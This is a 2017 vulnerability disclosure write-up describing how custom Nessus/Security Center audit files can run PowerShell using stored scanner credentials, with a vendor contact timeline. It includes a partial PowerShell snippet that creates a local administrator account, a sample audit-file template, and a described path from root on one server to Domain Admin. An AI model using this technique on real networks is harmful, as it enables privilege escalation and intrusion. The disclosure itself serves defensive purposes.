Abusing Tenable Nessus / Security Center with Audit Files and Powershell. #Nessus #Infosec #ExploitDelivery #RBACBypass #InsiderThreat

Title: Abuse of Tenable Nessus/Security Center with Audit Files and Powershell.

Class: Exploit Delivery System/RBAC Bypass/Insider Abuse/Pivot Vector.

Signed PDF with Keybase PGP key

Wylie's PGPKey

Date Published: 2017-07-27

Last Update: 2017-06-22

Vendors contacted: Tenable Network Security - https://www.tenable.com

  • 2016-12-05 - First notification sent by Wylie Bayes to Tenable Consultant Jack Daniel.
  • 2016-12-07 - Acknowledgement of first notification received from Tenable team.
  • 2017-01-04 - Sent follow up email for progress update to Tenable team.
  • 2017-01-04 - Received update from Tenable stating two teams were working on the problem, with two possible solutions being explored.
  • 2017-02-01 - Sent follow up email for progress update to Tenable team.
  • 2017-02-01 - Received response and new .nbin file to test.
  • 2017-02-02 - Tested .nbin file from Tenable but were still able to create local admins. Sent results back to Tenable team.
  • 2017-02-03 - Received 2nd .nbin file for testing from Tenable team.
  • 2017-02-06 - Tested 2nd .nbin file but were still able to create local admins. Sent results back to Tenable team.
  • 2017-02-06 - Received request for example code / audit file from Tenable team to demonstrate how local admins were being created.
  • 2017-02-06 - Provided the requested information to Tenable team.
  • 2017-02-06 - Received 3rd .nbin file for testing from Tenable team.
  • 2017-02-06 - Tested 3rd .nbin file and NO local admin was created. Success!
  • 2017-02-06 - Requested release date, and plugin ID# of fix as soon as they had the information.
  • 2017-02-06 - Received acknowledgement that the information would be sent as soon as it was known by Tenable team.
  • 2017-02-13 - Received release plan information from Tenable team.
  • 2017-02-13 - New plugin released. ==Plugin ID# 21156 , version 1.252. Published into update Feed! ==
  • 2017-02-14 - Confirmed new plugin was published by Tenable team.
  • 2017-02-15 - Received request from Tenable to not publish findings due to investigation of this issue, leading to other compliance scanning abuse. Specifically mentioned "Unix" compliance auditing being vulnerable as well.
  • 2017-02-15 - Agreed to not disclose until other compliance abuse problems are fixed, and that a Tenable security advisory is published giving Wylie Bayes credit for the initial finding.
  • 2017-03-14 - Sent follow up message to Brian Martin at Tenable. Received response but nothing useful. Extended to "3 month" estimate, vice previously stated 2 month estimate on 2/15, and stated he would follow up again at the "half way point."
  • 2017-04-14 - Contacted Tenable again for an update. Did not receive any useful information.
  • 2017-04-19 - Received update repeating prior information with nothing useful.
  • 2017-05-03 - Sent email expressing my concerns of lack of transparency and lack progress updates. The estimated "3 month" timeline to fix "the unix side" is about to expire. (05/14/17)
  • 2017-05-04 - Response from Tenable "Understood. Let me take this to someone higher up in the Dev chain and see if I can set a better sense of urgency on our side."
  • 2017-05-05 - Follow up from Tenable that the issue was elevated to a "Sr. Director of Engineering" who at this point had not been involved at all.
  • 2017-05-17 - Email from my Tenable POC stating as of this date he was no longer with Tenable and passed me off to their generic "[email protected]" address.
  • 2017-05-17 - Sent email to generic address requesting new POC and more solid / transparent timeline.
  • 2017-05-22 - Sent email stating if a new POC is not assigned and timeline not presented within 7 days of this email, the information will go public.
  • 2017-06-13 - Made contact with another POC the "Senior Director Product Security" for Tenable.
  • 2017-06-16 - Got confirmation from POC that the stance from Tenable is now to implement controls and issue warnings within their UI(user interface) to mitigate this capability and explain its seriousness to admins and users.
  • 2017-06-22 - Disclosed to MDA(Missile Defense Agency) due to the serious nature of this unexpected system capability.
  • 2017-07-27 - Published this write up.

Vulnerability Description:

This product abuse method utilizes credentials stored within Tenable Nessus scanners, or Security Centers to launch custom created Audit files. The custom audit files can then make changes on Windows(and others as disclosed by Tenable). The ability to upload custom audit files is given to the lowest level user by default, and the user must simply select and use credentials stored / shared with them.


Disclosed this as a product abuse problem due to Tenable's nessus_compliance_reference.pdf documentation specifically stating:

"This item uses the field powershell_args to specify the arguments that need to be supplied to powershell.exe. If the location of powershell.exe is not default, you must use the powershell_console_file keyword to specify the location. Currently only the “get-” cmdlets are supported."

For example:

get-hotfix | where-object {$_.hotfixid -ne 'File 1'} | select Description,HotFixID,InstalledBy | format-list"

After successfully completing scans that do various other things without the use of "get-" cmdlets, I concluded this documentation was incorrect, and was part of the disclosure to tenable.

Technical Description - Exploit Code/Concept

Custom Audit file / base64 encoded powershell strings.
Here is an example of how to create a Local Admin on a machine:

    $test =
	$desc = "Admin added with Nessus Bitches"
	$password = "ThisPasswordisAwesome2016*"
	$username = "TestAdminNessus"
	$computername = $env:COMPUTERNAME   # place computername here for remote access
	$computer = [ADSI]"WinNT://$computername,computer"
	$user = $computer.Create("user", $username)
    $user.description = $desc
	$user.UserFlags = 65536
	$group = [ADSI]("WinNT://$computername/administrators,group")


test.audit file:

<check_type: "Windows" version:"2">
<group_policy: "Test">

description:"Create Local Admin"
value_type: POLICY_TEXT
value_data: ""
ps_encoded_args : YES
only_show_cmd_output: YES
  • Uploading this into Nessus, or Tenable Security Center (with the proper licensing,) then attaching it to a scan policy allowed for use with credentials that were previously stored within, and then launch a scan to do your bidding.

  • Able to execute any cmdlets(or WMI processes) against any domain joined machine, with Domain Admin (DA) rights stored within a Nessus scanner, or Security Center. (Any account type can be abused if it is stored/shared)

To take this a step further I have found that it is possible to reset the admin, or other account password from the CLI if you have root access to the machine on a Security Center. There is also a simple commandline script for Nessus as well. So any box that was compromised in another fashion, could have the accounts reset and the attacker could then login to your scanner or security center and have access to all the credentials stored within for use. In this scenario the attacker could go from having root on a single server, to having Domain Admin on an entire enterprise in a matter of minutes. Scary stuff.

The only portion of this I tested before disclosing was the Windows/Powershell (Custom Audit) compliance abuse I have outlined above. This finding lead Tenable to fix other issues with compliance scanning, such as Unix. I only take credit for the Windows/Powershell research, which has been fixed and confirmed. Due to Tenable's Lack of response and follow up after the POC for this finding left the company, I was forced to publish my findings after multiple emails to Tenable went unanswered. The entire process took over 6 months time as you can see from the timeline at the beginning of this publication.

Signed PDF with Keybase PGP

Wylie's PGPKey